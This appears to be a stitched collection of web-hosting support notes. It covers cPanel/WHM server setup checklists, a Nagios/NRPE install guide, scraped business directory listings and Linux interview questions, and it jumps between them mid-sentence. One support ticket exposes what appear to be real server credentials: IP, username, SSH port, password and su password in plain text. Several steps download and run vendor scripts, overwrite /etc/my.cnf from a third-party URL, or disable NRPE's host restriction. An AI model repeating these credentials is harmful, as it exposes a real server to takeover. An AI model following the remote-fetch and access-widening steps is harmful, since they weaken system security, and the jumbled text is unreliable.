and restart apache ) IX >In WHM,, type Suexec, PHP and SuExec Configuration >> php 5 hander >>Drop down (select dso) and save changes X > Check in another server for mysql connection > vi /etc/my.cnf (the values should be same on the new server) XI >Go to http://configserver.net/ >> ConfigServer Mail Queues >> Right click >> wget http://configserver.net/free/cmq.tgz Then go down on the link ConfigServer Mail Queues (install.txt) >> Click >> On the shell >> tar -xzf cmq.tgz >> cd cmq/ >>sh install.sh Refresh WHM and you will see ConfigServer Mail Queues at the left side bottom Then open the link ConfigServer Mail Manage from http://configserver.net/ and wget the link ( wget http://configserver.net/free/cmq.tgz) ConfigServer Mail Manage >> install.txt >> Click On the shell tar -xzf cmm.tgz cd cmm/ sh install.sh Login to WHM and scroll to the bottom of the left hand menu and you should see "ConfigServer Mail Manage" If http command is not there on the server, then on the another server, type which http. You will get a path for http. Then go in that path by vi /bin/http and on the new server, go by cd /bin and vi http and copy the code from old server(vi /bin/http) ### XII >Open a Old server WHM and edit packages >> and add package on a new server and enter the values as it is. XIII >Then WHM >> Feature manager Add Excite >>Feature List Name >> Excite >> Add >> Remove Click Be as we do not provide Click Be XIV >>Create a account as vanessatestjade.com(Example) from WHM >> Create account >>Package Excite XV >> Then run the command /scripts/fixquotas on the server *** XVI >> Login to shell of Prime server(if the new server configured is of site), prime port is 22 and root as user /scripts/whoowns network-command.com cd public_html/status03(if adding in 3rd page ) vi config.php Add the new server in the server list XVI >> Check the entries of the new added domain (step XIV) In the PowerDNS 1 and 2 XVII >> WHM >> Tweak Settings >> When adding a new domain, automatically create A entries for the registered nameservers if they would be contained in the zone. >> Unselect XVIII > Correct the following block in httpd.conf according to the server: vi /etc/httpd/conf/httpd.conf Just above the second block (pid) place the following NameVirtualHost 67.23.226.119:80 <VirtualHost 67.23.226.119:80> ServerName elite.nsjet.com (Server name) DocumentRoot /usr/local/apache/htdocs </VirtualHost> XIX >> cd /usr/local/apache/htdocs Search for the file serverstats_inc.php If not there, copy from any other server cat serverstats_inc.php Copy and paste on the new server Restart apache XX >> Change password on the shell with passwd Put any password Save Save in the Database In the data base Edit(Add Entry) Title(Server name) Username : IP Password : New one ==================================================== warning : unverified You can downgrade mysql or change version by doing this : vi /var/cpanel/cpanel.config Change the line mysql-version= to 4.0 or 4.1 or 5.0 Now run : /scripts/mysqlup --force Now re-run apache build (easyapache) - so it can build php-mysql connector /scripts/easyapacheHello, Let us know the exact link to see the error at our end so that we can investigate further. You can try troubleshooting the issue at your end as follows : * Goto cpanel >> mysql databases * Create database, database user *Assign privileges to database user for database. *Ensure that the db details matches in db connection file in your account. mysql socket download wget --output-document=/etc/my.cnf http://www.securecentos.com/temp/files/mysql/my.cnf once you download the fresh socket file got pico /etc/my.cnf you will see lines with socket keywors, just remove those lines and save the changes and restart mysql. How to install nagios on cpanel or linux server? Guys, Nagios is a powerful monitoring system that enables organizations to identify and resolve IT infrastructure problems before they affect critical business processes. Nagios is an open source application that monitors for computer network problems so that they can be fixed more quickly. Nagios was designed for use with the Linux operating system, but it will also work under Unix and most Unix-based systems. Nagios runs periodic checks on user-specified resources and services. Resources that can be monitored include memory usage, disk usage, microprocessor load, the number of currently running processes, and log files. Services that can be monitored include Simple Mail Transfer Protocol (SMTP), Post Office Protocol 3 (POP3), Hypertext Transfer Protocol (HTTP), and other common network protocols. The program can monitor environmental variables such as temperature, humidity, or barometric pressure in conjunction with the appropriate measuring hardware. A user-friendly Web-based graphical user interface is provided. An authorization system allows the administrator to restrict access as necessary. I have referred following steps to install and configure the nagios. Before proceeding to mention the steps let me tell some points. Here I have installed nagios on monitoring server. So, this server will monitor other remote servers. Here are the required tools for them. [A] For monitoring server(Who will monitor others) : a)nagios b) nagios-plugin c) nrpe daemon [B] For monitored remote server(who will be monitored) : a) nagios-plugin c) nrpe daemon [C] Configuring monitoring server to monitor remote hosts. Let IP of monitoring server is 64.34.203.8. and 76.74.238.165 is the IP of remote server. Now please make it sure that following packages has installed on the server. ------- php-mysql php-gd php-ldap php-xml gd gd-devel gcc glibc glibc-common libstdc++-devel gcc-c++perl-DBI perl-DBD-MySQL perl-Config-IniFiles rrdtool perl-rrdtool Note : For cpanel server all the modules might have installed. You can also enable them using /scripts/easyapache or yum install mod_name ------- ========================================= I am mentioning step by step here : [A] Installing and configuring the monitoring tools on monitoring server(Who will monitor others) : a)nagios b) nagios-plugin c) nrpe daemon :- a)nagios :- ------------------ 1. Login into the server via ssh and gain root access. 2. useradd nagios 3. passwd nagios 4. groupadd nagcmd 5. /usr/sbin/usermod -a -G nagcmd nagios 6. /usr/sbin/usermod -a -G nagcmd nobody Note : here nobody is the apache user on my server(cpanel linux server). You can get the user by executing the following command : root@server [/usr/local/src]# grep '^User' /usr/local/apache/conf/httpd.conf User nobody UserDir public_html root@server [/usr/local/src]# 7. cd /usr/local/src/ 8. wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-3.2.1.tar.gz 9. tar -xvzf nagios-3.2.1.tar.gz 10. cd nagios-3.2.1 11. ./configure --with-command-group=nagcmd 12. make all 13. make install 14. make install-init 15. make install-config 16. make install-commandmode 17. make install-webconf Note: During executing "make install-webconf" you'll face following error message. `````````````````````````````````````````````````````````` root@server [/usr/local/src/nagios-3.2.1]# make install-webconf /usr/bin/install -c -m 644 sample-config/httpd.conf /etc/httpd/conf.d/nagios.conf /usr/bin/install: cannot create regular file `/etc/httpd/conf.d/nagios.conf': No such file or directory make: *** [install-webconf] Error 1 I hope you got the clue from this error message. So, please make a directory and link with cpanel apache conf.d like : root@server [/usr/local/src/nagios-3.2.1]# mkdir -p /etc/httpd/conf.d root@server [/usr/local/src/nagios-3.2.1]# ln -s /etc/httpd/conf.d /usr/local/apache/conf.d Then execute the above webconf once again. It'll create nagios.conf file in that conf.d directory. That's it. This is for integrating the nagios with webserver. `````````````````````````````````````````````````````````` 18. htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin //provide password here. That's it for nagios. For my case here are the content in conf.d ```````` root@server [/etc/httpd/conf.d]# ll total 12 drwxr-xr-x 2 root root 4096 Sep 26 23:22 ./ drwxr-xr-x 18 root root 4096 Sep 26 23:17 ../ lrwxrwxrwx 1 root root 6 Sep 26 23:20 conf.d -> conf.d -rw-r--r-- 1 root root 1010 Sep 26 23:22 nagios.conf root@server [/etc/httpd/conf.d]# ```````` =================================== b) nagios-plugin installation :- 1. cd /usr/local/src/ 2. wget wget http://prdownloads.sourceforge.net/sourceforge/nagiosplug/nagios- plugins-1.4.11.tar.gz 3. tar -xvzf nagios-plugins-1.4.11.tar.gz 4. cd nagios-plugins-1.4.11 5. ./configure --with-nagios-user=nagios --with-nagio-group=nagios 6. make 7. make install 8. chkconfig --add nagios 9. chkconfig nagios on 10. chown nagios.nagios /usr/local/nagios 11. chown -R nagios.nagios /usr/local/nagios/libexec 12. /usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg ```````````````` 10th command will check the configuration whether it's correct or not. If it's correct it'll show following : .............. Total Warnings: 0 Total Errors: 0 Things look okay - No serious problems were detected during the pre-flight check If there is no error it means your nagios configuration is correct and you can start nagios service. ............. ````````````````` 13. /etc/init.d/nagios start 14. ps aux | grep nagios //check whether nagios is running or not. that's it for nagios plugin :) =================================== c) nrpe daemon installation : -- 1. cd /usr/local/src/ 2. wget http://prdownloads.sourceforge.net/sourceforge/nagios/nrpe-2.12.tar.gz 3. tar -xvzf nrpe-2.12.tar.gz 4. cd nrpe-2.12 ...... Make sure openssl-devel has installed on the server. Check like root@server [/usr/local/src/nrpe-2.12]# rpm -qa | grep openssl-devel openssl-devel-0.9.8e-12.el5_4.6 root@server [/usr/local/src/nrpe-2.12]# Else execute : yum install openssl* ...... 5. ./configure 6. make all 7. make install-plugin 8. make install-daemon 9. make install-daemon-config 10. make install-xinetd ....... Note : Make sure that xinetd has installed on the server. Else install it like yum install xinetd ....... 11. vi /etc/xinetd.d/nrpe and disable “only_from” directive. So, the content of the file will look like : ....... root@server [~]# cat /etc/xinetd.d/nrpe # default: on # description: NRPE (Nagios Remote Plugin Executor) service nrpe { flags = REUSE socket_type = stream port = 5666 wait = no user = nagios group = nagios server = /usr/local/nagios/bin/nrpe server_args = -c /usr/local/nagios/etc/nrpe.cfg --inetd log_on_failure += USERID disable = no # only_from = 127.0.0.1 } root@server [~]# ....... 12. echo "nrpe 5666/tcp # NRPE" >> /etc/services 13. Make it sure that you have opened the above port at the firewall. 14. chkconfig xinetd on 15. service xinetd restart op will be like : ..... root@server [/usr/local/src/nrpe-2.12]# chkconfig --list | grep xinetd xinetd 0:off 1:off 2:on 3:on 4:on 5:on 6:off xinetd based services: root@server [/usr/local/src/nrpe-2.12]# service xinetd restart Stopping xinetd: [ OK ] Starting xinetd: [ OK ] root@server [/usr/local/src/nrpe-2.12]# ..... That's it. Test the NRPE daemon locally : 16. netstat -at | grep nrpe Here is the o/p : ........ tcp 0 0 *:nrpe *:* LISTEN root@server [/usr/local/src/nrpe-2.12]# netstat -plan | grep 5666 tcp 0 0 0.0.0.0:5666 0.0.0.0:* LISTEN 31130/xinetd root@server [/usr/local/src/nrpe-2.12]# ........ 17. /usr/local/nagios/libexec/check_nrpe -H localhost Here is the o/p : ........ root@server [/usr/local/src/nrpe-2.12]# /usr/local/nagios/libexec/check_nrpe -H localhost NRPE v2.12 root@server [/usr/local/src/nrpe-2.12]# ........ =================================== [B] Installing and configuring the monitoring tools on monitored server (who will be monitored) : a) nagios-plugin c) nrpe daemon Login into the remote server via ssh and gain root access. a) : nagios-plugin installation : 1. cd /usr/local/src/ 2. /usr/sbin/useradd nagios 3. passwd nagios 4. wget http://prdownloads.sourceforge.net/sourceforge/nagiosplug/nagios-plugins-1.4.15.tar.gz 5. tar -xvzf nagios-plugins-1.4.15.tar.gz 6. cd nagios-plugins-1.4.15 7. ./configure 8. make 9. make install 11. chown nagios.nagios /usr/local/nagios 12. chown -R nagios.nagios /usr/local/nagios/libexec 13. Make sure that xinetd has installed on the server. Else install using : yum install xinetd That's it :) =================================== b) nrpe daemon installation :- 1. cd /usr/local/src/ 2. wget http://prdownloads.sourceforge.net/sourceforge/nagios/nrpe-2.12.tar.gz 3. tar -xvzf nrpe-2.12.tar.gz 4. cd nrpe-2.12 ...... Make sure openssl-devel has installed on the server. Check like root@server [/usr/local/src/nrpe-2.12]# rpm -qa | grep openssl-devel openssl-devel-0.9.8e-12.el5_4.6 root@server [/usr/local/src/nrpe-2.12]# Else execute : yum install openssl* ...... 5. ./configure 6. make all 7. make install-plugin 8. make install-daemon 9. make install-daemon-config 10. make install-xinetd ....... Note : Make sure that xinetd has installed on the server. Else install it like yum install xinetd ....... 11. vi /etc/xinetd.d/nrpe and change the IP at the “only_from” directive. It'll be monitoring server's(who will monirot) IP. For my case it was 64.34.203.8. So, the content of the file will look like : ....... root@server [/etc/xinetd.d]# hostname server.loveme.com root@server [/etc/xinetd.d]# cat /etc/xinetd.d/nrpe # default: on # description: NRPE (Nagios Remote Plugin Executor) service nrpe { flags = REUSE socket_type = stream port = 5666 wait = no user = nagios group = nagios server = /usr/local/nagios/bin/nrpe server_args = -c /usr/local/nagios/etc/nrpe.cfg --inetd log_on_failure += USERID disable = no only_from = 64.34.203.8 } root@server [/etc/xinetd.d]# ....... 12. echo "nrpe 5666/tcp # NRPE" >> /etc/services 13. Make it sure that you have opened the above port at the firewall. 14. chkconfig xinetd on 15. service xinetd restart op will be like : ..... root@server [/usr/local/src/nrpe-2.12]# chkconfig --list | grep xinetd xinetd 0:off 1:off 2:on 3:on 4:on 5:on 6:off xinetd based services: root@server [/usr/local/src/nrpe-2.12]# service xinetd restart Stopping xinetd: [ OK ] Starting xinetd: [ OK ] root@server [/usr/local/src/nrpe-2.12]# ..... Test the NRPE daemon locally : 16. netstat -at | grep nrpe Here is the o/p : ........ tcp 0 0 *:nrpe *:* LISTEN root@server [/usr/local/src/nrpe-2.12]# netstat -plan | grep 5666 tcp 0 0 0.0.0.0:5666 0.0.0.0:* LISTEN 31130/xinetd root@server [/usr/local/src/nrpe-2.12]# ........ 17. /usr/local/nagios/libexec/check_nrpe -H localhost Here is the o/p : ........ root@server [/usr/local/src/nrpe-2.12]# /usr/local/nagios/libexec/check_nrpe -H localhost NRPE v2.12 root@server [/usr/local/src/nrpe-2.12]# ........ That's it. ================================================================================ [C] Configuring monitoring server to monitor remote hosts :- Login into the monitoring server(who will monitor) via ssh and gain root access. 1. Create a command definition: /usr/local/nagios/etc/commands.cfg and add following entries in that file : --- root@server [/usr/local/nagios/etc/objects]# cat /usr/local/nagios/etc/commands.cfg define command{ command_name check_nrpe command_line $USER1$/check_nrpe -H $HOSTADDRESS$ -c $ARG1$ } root@server [/usr/local/nagios/etc/objects] --- 2. chown nagios. /usr/local/nagios/etc/commands.cfg 3. create the file /usr/local/nagios/etc/objects/linux-box-remote.cfg and add following entries in that file. ........ root@server [/usr/local/nagios/etc/objects]# cat /usr/local/nagios/etc/objects/linux-box-remote.cfg define host{ name linux-box-remote ; Name of this template use generic-host ; Inherit default values check_period 24x7 check_interval 5 retry_interval 1 max_check_attempts 10 check_command check-host-alive notification_period 24x7 notification_interval 30 notification_options d,r contact_groups admins register 0 ; DONT REGISTER THIS - ITS A TEMPLATE } define host{ use linux-box-remote ; Inherit default values from a template host_name server.ubeea2.com ; The name we're giving to this server alias ubeea2 ; A longer name for the server address 76.74.238.165 ; IP address of the server } define service{ use generic-service host_name server.ubeea2.com service_description CPU Load check_command check_nrpe!check_load } define service{ use generic-service host_name server.ubeea2.com service_description Current Users check_command check_nrpe!check_users } define service{ use generic-service host_name server.ubeea2.com service_description /dev/hda1 Free Space check_command check_nrpe!check_hda1 } define service{ use generic-service host_name server.ubeea2.com service_description Total Processes check_command check_nrpe!check_total_procs } define service{ use generic-service host_name server.ubeea2.com service_description Zombie Processes check_command check_nrpe!check_zombie_procs } root@server [/usr/local/nagios/etc/objects]# .......... Note : Change the IP and hostname. Then call this file in the nagios.cfg file. Just add like 4. cfg_file=/usr/local/nagios/etc/objects/linux-box-remote.cfg Example : ........ root@server [/usr/local/nagios/etc]# grep linux-box-remote.cfg /usr/local/nagios/etc/nagios.cfg cfg_file=/usr/local/nagios/etc/objects/linux-box-remote.cfg ........ 5. chown nagios. /usr/local/nagios/etc/objects/linux-box-remote.cfg 6. check config like : .... root@server [/usr/local/nagios/etc/objects]# /usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg Make sure warning and error are zero. .... 7. service nagios restart 8. You can add multple remote host in the linux-box-remote.cfg file. Just add another entry like second defined "host" to last one(only you have to change the hostname and services those you want to monitor). That's it. Try :) vim /etc/nsswitch.conf vi /etc/named.conf resolver.confHostech Support? - more info » Flat No.5, Landmark Building,, Model Colony Chowk, College Road, Nasik, Maharashtra 422009? - 09967906284? Write a review "Our Company. Hostech Support is one of the Best Hosting Technical support provider. We offer quality and 24x7 technical support for leading hosting ..." hostechsupport.com Host.co.in? - more info » DSouza Colony Rd, 403, Rohan Heights, Nashik, Maharashtra 422005? - 09860900069? Category: Web Hosting Write a review - 1 coupon "Regards Viraj http://www.host.co.in Phone:0253-2342932|Mobile:+91-9860900069. Support/Billing/Sales:24x7x365 sales@host.co.in | support@host.co.in ..."Error translating cpanel.net Hostech Support? - more info » Flat No.5, Landmark Building,, Model Colony Chowk, College Road, Nasik, Maharashtra 422009? - 09967906284? Write a review "Our Company. Hostech Support is one of the Best Hosting Technical support provider. We offer quality and 24x7 technical support for leading hosting ..." hostechsupport.com Aress Software And Education Technologies Pvt Ltd? - more info » L-13,Ambad, M I D C, Nashik, 422010? - 0253 2344998? Write a review "Aress Software promoted, Techsupport.in enables its clients to focus primarily on their business by providing reliable, high quality end-user support to ..." prlog.org thinksupport.net? - more info » 2nd Floor, Gajra Chambers, Mumbai Agra Highway, Nasik, Maharashtra 422009? - 09822034329? Write a review "ThinkSupport is a unique blend of technology and experience, establishing our presence all over the globe.. Everyone here at ThinkSupport believes ..." thinksupport.com Dorotheus Technologies? - more info » Ojhar, 3, 1st Floor, Bansi Plaza, Nasik, Maharashtra 422206? - 02550 329238? Write a review "E-junkie Shopping Cart and Digital Delivery. The smartest solution for file sharing and large file transfer over Internet is HERE! ..." dorotheus.com Itrix Incorporation? - more info » Near Durga International Hotel, 3, Siddhi, Shree Colony, Nashik, Maharashtra 422101? - 09890033980? Category: Services - Software Development 1 review - Write a review "Its very important in business to get honest partners. What I like most about ..." eluminous Technologies? - more info » College Rd, Nasik, ?????????? 422005? - 0253 6521258? Category: Services - Web Hosting Write a review THREE S? - more info » Satpur, Nasik, ?????????? 422007? - 09890208898? Category: Services - Web Development Write a review C-Tech Solutions? - more info » Satpur, Nasik, ?????????? 422007? - 0253 6628476? Category: Services - Web Hosting Write a review 1 ) Pamtsoft Systems Software? - more info » Shivaji Nagar, Nasik, ?????????? 422006? - 09822490026? Category: Services - Web Design Write a review Gnext technologies? - more info » MIDC Ambad, Nasik, ?????????? 422010? - 09890515840? Category: Services - Web Hosting Write a review Dreamz Infotech? - more info » Building No. 3, Stadium Complex,, M.G.Road, Nashik, Maharashtra 422001? - 09371115695? Category: Services - Web Development Write a review dplanet (Animate Yourself)? - more info » nashik, nashik, Maharashtra 422006? - 09850210424? Category: Services - Web Development 1 review - Write a review "dplanet is very nice web designing & web hosting company in nasik ..." Om Web Solution? - more info » flat no.4, roongta blossom, suman petrol pump, rajiv nagar, Nasik, Maharashtra 422009? - 0253 2376206? Write a review - 1 coupon imorse Technologies? - more info » Upasana Shree Colony, behind Neharu Nagar Bus Stop, Nasik Rd, Maharashtra 422101? - 09890045199? Category: Services - Web Design Write a review Aviators Infotech? - more info » N-34/s-1/15-1/4, Rane nagar, New nashik., nashik, Maharashtra 422009? - 09765127177? Category: Services - Web Hosting 1 review - Write a review "Really glad to know that in nashiks web designers, we can find such ..." Decision Softwares Pvt. Ltd.? - more info » College Road, Nashik, 6, Jyotidarshan, Vise Mala, Nashik, Maharashtra 422005? - 09422264642? Category: Services - Software Development Write a review - 1 coupon Netwin Systems & Software (I) Pvt Ltd? - more info » Canada Corner, 1, 2 Prestige Point, Opp Vasant Market, Nashik, Maharashtra 422005? - 0253 2309214? Category: Services - Software Development Write a review dplanet (Animate Yourself)? - more info » NH 50, Nasik, ?????????? 422006? - 09764584258? Category: Services - Web Hosting Write a review Web Technology Generation? - more info » Shadhu Waswani Rd, Nasik, ?????????? 422001? - 0253 2572824? Write a review E Web Link Solutions? - more info » Shivaji Nagar, Nasik, ?????????? 444005? - 0253 2415497? Write a review mywebhostingsolutions? - more info » B-10, Divya Darshan Appt., B-10, Divya Darshan Appt., Nasik, Maharashtra 422005? - 0253 3012279? Category: Services - Web Design Write a review Creative Interevntions? - more info » College Rd, Nasik, ?????????? 422005? - 0253 2571373? Category: Services - Software Development Write a review ahydra Informatics? - more info » Kanade Maruti Ln, Nasik, ?????????? 442001? - 0253 2501584? Category: Website Development, Software Development. Write a review HUM-TUM? - more info » Opp. Yash Plaza, Cidco-Ambad Link Road,, Pawan Nagar, Cidco,, Nashik, Maharashtra 422009? - 0253 2372164? Category: Services - Web Design System & Solution? - more info » 10, Ashmit, Sagar Complex, New Adagao naka,, Nasik, ?????????? 422003? - 09890394482? Category: Services - Web Development Write a review Navinya Services? - more info » maharashtra, nashik, igatpuri, Maharashtra 422403? - 09860336036? Category: Services - Web Hosting Write a review Call Center Plexus? - more info » Madhusmit,College Road,Opposite K B H: Vidyalaya, Patil Lane No 1, Nashik, 422005? - 0253 6610788? Category: Bpo / Call Centres / Back Office Services Write a review Placement Niyukti Placement Services? - more info » “Shivalay”, 28, Shramik – 2,, Near S.T. Colony, Gangapur Road,, Nashik, Maharashtra 422013? - 099 70090009? Category: Job, Jobs, Recruitment Consultant Nirmal Typewriters? - more info » 73,Nmc Building,Opposite Nmc Building, Main Road, Nashik, 422001? - 0253 2506932? netstat -an | grep SYN|sort|uniq|awk '{print $5}'|sed 's/\:/ /g'|awk '{print "csf -d "$1}'New IP requirement Hello, Please allocate an IP from our existing allocated range (see DECC user colo@minmaxgroup.com) to server east.nseasy.com. Server Details as follows: Hostname: east.nseasy.com IP : 66.7.221.70 Username : 3gteam Password: e%b68.-?rMz# Port no: 1097 Su password: G2@LV.mdWvD~ ========================= Regards, Susannah *************************************************************************** adding new IP to server /scripts/rebuildippoolNew Server Configuration __________________________________________________________________________ Introduction It's vital that the server is configured correctly 1 – Verify Server Specifications 1 - PowerAdmin DNS Login to poweradmin One and two (Add Supermaster zone) IP new server IP Host name: ns1.site.com or 1.nseasy.com Account : server name 2 – Add 'A' record for the server hostname. Search Zone and Records (e.g. site.com, nseasy.com, nsjet.com) Edit and Add A record (IP of the new server) 3 - ??? Open another shell (different server) and type vi /etc/named.conf Copy the line also-notify with IP address and semi colon and New server : vi /etc/named.conf Paste the also notify lines and save (:wq!) 4 – Add Wheel Group User On the shell of the new server, type: useradd 3gteam passwd 3gteam (Enter the password for 3gteam) Restart sshd, then: vi /etc/group wheel:x:10:root,3gteam 5 – Configure SSH Port & Preferences vi /etc/ssh/sshd_config Remove # and enter port number 1097 Remove # and PermitRootlogin Yes Change to PermitRootlogin No In WHM, In ConfigServer Security & Firewall, Firewall Configuration and add the IP 1097 in TCP_IN and TCP_Out 6 - PowerAdmin DNS Go to WHM >> ConfigServer Security & Firewall >> Check Server Security >> Check /tmp permissions , Check /var/tmp permissions, Check /usr/tmp permissions Change all permissions as given in WHM on the shell 7 - ??? Check the php.ini file of the another server and compare it with the new server (Disable functions >> Just remove exec from the shell and restart apache) 8 – Enable PHP SuExec In WHM, type Suexec, PHP and SuExec Configuration >> php 5 hander >>Drop down (select dso) and save changes 9 - MySQL Check in another server for mysql connection > vi /etc/my.cnf (the values should be same on the new server) 10 - CSF Go to http://configserver.net/ >> ConfigServer Mail Queues >> Right click >> wget http://configserver.net/free/cmq.tgz Then go down on the link ConfigServer Mail Queues (install.txt) >> Click >> Shell: tar -xzf cmq.tgz cd cmq/ sh install.sh Refresh WHM and you will see ConfigServer Mail Queues at the left side bottom Then open the link ConfigServer Mail Manage from http://configserver.net/ and wget the link ( wget http://configserver.net/free/cmq.tgz) ConfigServer Mail Manage >> install.txt >> Click Shell: tar -xzf cmm.tgz cd cmm/ sh install.sh Login to WHM and scroll to the bottom of the left hand menu and you should see "ConfigServer Mail Manage" If http command is not there on the server, then on the another server, type which http. You will get a path for http. Then go in that path by vi /bin/http and on the new server, go by cd /bin and vi http and copy the code from old server (vi /bin/http) 11 – Packages & Features Open a Old server WHM and edit packages >> and add package on a new server and enter the values as it is. Then WHM >> Feature manager Add Excite >>Feature List Name >> Excite >> Add >> Remove Click Be as we do not provide Click Be 12 - PowerAdmin DNS Create a account as vanessatestjade.com (Example) from WHM >> Create account >> Package Excite 13 – Quotas Then run the command /scripts/fixquotas on the server 14 - PowerAdmin DNS Check the entries of the new added domain, In the PowerDNS 1 and 2 15 – WHM Configuration Statistics Software Configuration Enable Analog, Awstats & Webalizer Tweak Settings When adding a new domain, automatically create A entries for the registered nameservers if they would be contained in the zone. >> Unselect The load average that will cause the server status to appear red = 10 Apache mod_userdir Tweak 16 - PowerAdmin DNS Correct the following block in httpd.conf according to the server: vi /etc/httpd/conf/httpd.conf Just above the second block (pid) place the following NameVirtualHost 67.23.226.77:80 (New server IP) <VirtualHost 67.23.226.77> (New Server IP) ServerName ice.site.com (New Server Name) DocumentRoot /usr/local/apache/htdocs </VirtualHost> 17 – RV Site Builder a) To install Rv site builder on the cpanel server follow the following steps: cd /usr/local/cpanel/whostmgr/docroot/cgi/ rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/ rm -f rvsitebuilderinstaller.tar wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar tar -xvf rvsitebuilderinstaller.tar chmod 755 addon_rvsitebuilder.cgi rm -f rvsitebuilderinstaller.tar b) Open root WHM, at the bottom of menu on the left side where is under Plugins section, you will find RVSiteBuilder Manager menu. c) Click RVSiteBuilder Manager to begin installation process. Which may take 10 to 20 minutes to complete. d) Done!! Your cPanel should show RVSiteBuilder as a feature in all cPanel users. 18 - Fantastico To Install Fantastico kindly follow the following steps on the server. 1) cd /usr/local/cpanel/whostmgr/docroot/cgi Now you will need to download fantastico from netenberg. 2) wget http://www.netenberg.com/files/free/fantastico_whm_admin.tgz Now extract the file. 3) tar -xzpf fantastico_whm_admin.tgz Remove fantastico_whm_admin.tgz once it is extracted. 4) rm -rf fantastico_whm_admin.tgz Now go to WHM, login as root and follow the link WHM >> Add-Ons >> Fantastico De Luxe WHM Admin (one of the lasts entries depending on your setup). There you complete the installation by following the online screens. Once done you are ready to use fantastico. NOTE: Fantastico is a system designed to make installing popular scripts easy. Fantastico is a program that integrates with the popular online control panel Cpanel 19 – MinMax Monitoring Login to shell of Prime server (if the new server configured is of site), prime port is 22 and root as user /scripts/whoowns network-command.com cd public_html/status03 (if adding in 3rd page ) vi config.php Add the new server in the server list cd /usr/local/apache/htdocs Search for the file serverstats_inc.php If not there, copy from any other server cat serverstats_inc.php Copy and paste on the new server Restart apache 20 – Panopta 20 – DC Monitoring 21 – Nagios 22 – Shared SSL Provision and Installation Change password on the shell with passwd Put any password Save Save in the Database In the data base Edit (Add Entry) Title (Server name) Username : IP Password : New one 23 – Add to Billing System 24 – Shared SSL Provision and Installation 25 - Disable Customer Contact Login to WHM and go to “Configure Customer Contact” Select the radio button “Disable” Click on “Save Changes” 26 - Remove Supprot from Feature manager Login to WHM and go to “Feature Manager” Select “default” from drop box and click on edit Search “Support” in the list and uncheck it. 27 - Run AXON script Login to shell and run the following command on root #wget repo1.dimenoc.com/dimenoc/DimeNOC.repo -O /etc/yum.repos.d/DimeNOC.repo && yum -y install axond 28- Configure backup 29 - Install kernel script Login to shell of any server and new server Type bellow commands on both the servers # cd /home/3gteam # vi /kscript Above command will open the new file named as kscript on new server. Just copy the contents of the kscripts file from old server and paste. Save the file and quit. Notes: 1. what is ddos attack and how to prevent? 2. What is file system? 3. What is IP spoofing? 4. Port Numbers. 5. How to work FTP and what is use of port 20 and 21? 6. What is kernerl? 7. How many tables in iptables? 8. What are shell variables? 9. What is 'inode'? 10. What are the main differences between RHEL4 & RHEL5? 11. What is difference between imap and pop? 12. Describe linux boot sequence: 13. What different between port and protocols? 14. What is the difference between UDP and TCP internet protocols? 15. What is a zombie process? 16. What is difference between daemon and process? 17. Logs location. 18. difference between unix and linux? 19. What are the main differences between RHEL4 & RHEL5? 20. What are seven fields in the /etc/passwd file? 21. What is a filesystem? 22. What command is used to remove the password assigned to a group? 23. Which of the following commands will show a list of the files in your home directory including hidden files and the contents of all subdirectories? 24. Which file defines all users on your system? 25. What is the minimum number of partitions you need to install Linux? 26. What is a PID? 27. Difference between Hard Link and Soft Link in Linux? 28. What is Raid? The different types and Levels of Raid? 29. What is NFS? What is its purpose? 30. What does nslookup do? 31. What is .htaccess? 32. How many field in crontab? 33. Which log contains information on currently logged in users? 34. What is DNS? 35. How do you create a swapfile? 36. How to get the mysqlbackup and restore? 37. Where is located hardware configuration file in linux? 38. Whats the advantage of using ssh over telnet? 39. How to assign temporary IP address to lan-card? 40. How to recover grub on linux server? 41. How to setup log rotation on linux server? 42. How to see only sub-directory in directory? 43. How to see only files in directory? 44. How to replace the word without opening the file? Fsck Generally, fsck is run automatically at boot time when the operating system detects that a file system is in an inconsistent state, indicating a non-graceful shutdown, such as a crash or power loss. As the command must be tailored specifically to the design of the file system, the exact behavior of various fsck implementations will vary. Typically, fsck utilities provide options for either interactively repairing damaged file systems (the user must decide how to fix specific problems), automatically deciding how to fix specific problems (so the user doesn't have to answer any questions), or reviewing the problems that need to be resolved on a file system without actually fixing them. A system administrator can also run fsck manually if there is believed to be a problem with the file system. Because running fsck to repair a file system which is mounted for read/write operations can potentially cause severe data corruption/loss, the file system is normally checked while unmounted, mounted read-only, or with the system in a special maintenance mode that limits the risk of such damage. A journaling file system is designed such that tools such as fsck do not need to be run after unclean shutdown (i.e. crash). The UFS2Filesystem in FreeBSD has background fsck, so it is usually not necessary to wait for fsck to finish before accessing the disk. The Microsoft equivalent programs are CHKDSK and SCANDISK. 11. What is difference between imap and pop? POP3 IMAP Since email needs to be downloaded into desktop PC before being displayed, you may have the following problems for POP3 access: * You need to download all email again when using another desktop PC to check your email. * May get confused if you need to check email both in the office and at home. The downloaded email may be deleted from the server depending on the setting of your email client. Since email is kept on server, it would gain the following benefits for IMAP access: * No need to download all email when using other desktop PC to check your email. * Easier to identify the unread email. All messages as well as their attachments will be downloaded into desktop PC during the 'check new email' process. A whole message will be downloaded only when it is opened for display from its content. Mailboxes can only be created on desktop PC. There is only one mailbox (INBOX) exists on the server. Multiple mailboxes can be created on the desktop PC as well as on the server. Filters can transfer incoming/outgoing messages only to local mailboxes. Filters can transfer incoming/outgoing messages to other mailboxes no matter where the mailboxes locate (on the server or the PC). Outgoing email is stored only locally on the desktop PC. Outgoing email can be filtered to a mailbox on server for accessibility from other machine. Messages are deleted on the desktop PC. Comparatively, it is inconvenient to clean up your mailbox on the server. Messages can be deleted directly on the server to make it more convenient to clean up your mailbox on the server. Messages may be reloaded onto desktop PC several times due to the corruption of system files. The occurrence of reloading messages from the server to PC is much less when compared to POP3. 13. What different between port and protocols? A protocol is an agreement on how to interpret data and how to respond to messages. They generally specify message formats and legal messages. Examples of protocols include: * TCP/IP * HTTP * SSH A port is part of socket end point in TCP and UDP. They allow the operating system to distinguish which TCP or UDP service on the host should receive incoming messages. The confusion generally arises because, a number of ports are reserved (eg. port 80) and are generally listened to by severs expecting a particular protocol (HTTP in the case of port 80). While messages send to port 80 are generally expected to be HTTP messages, there is nothing stopping an non-HTTP server from listening on port 80 or an HTTP server from listening on an alternative port (for example 8080 or 8088). 14. What is the difference between UDP and 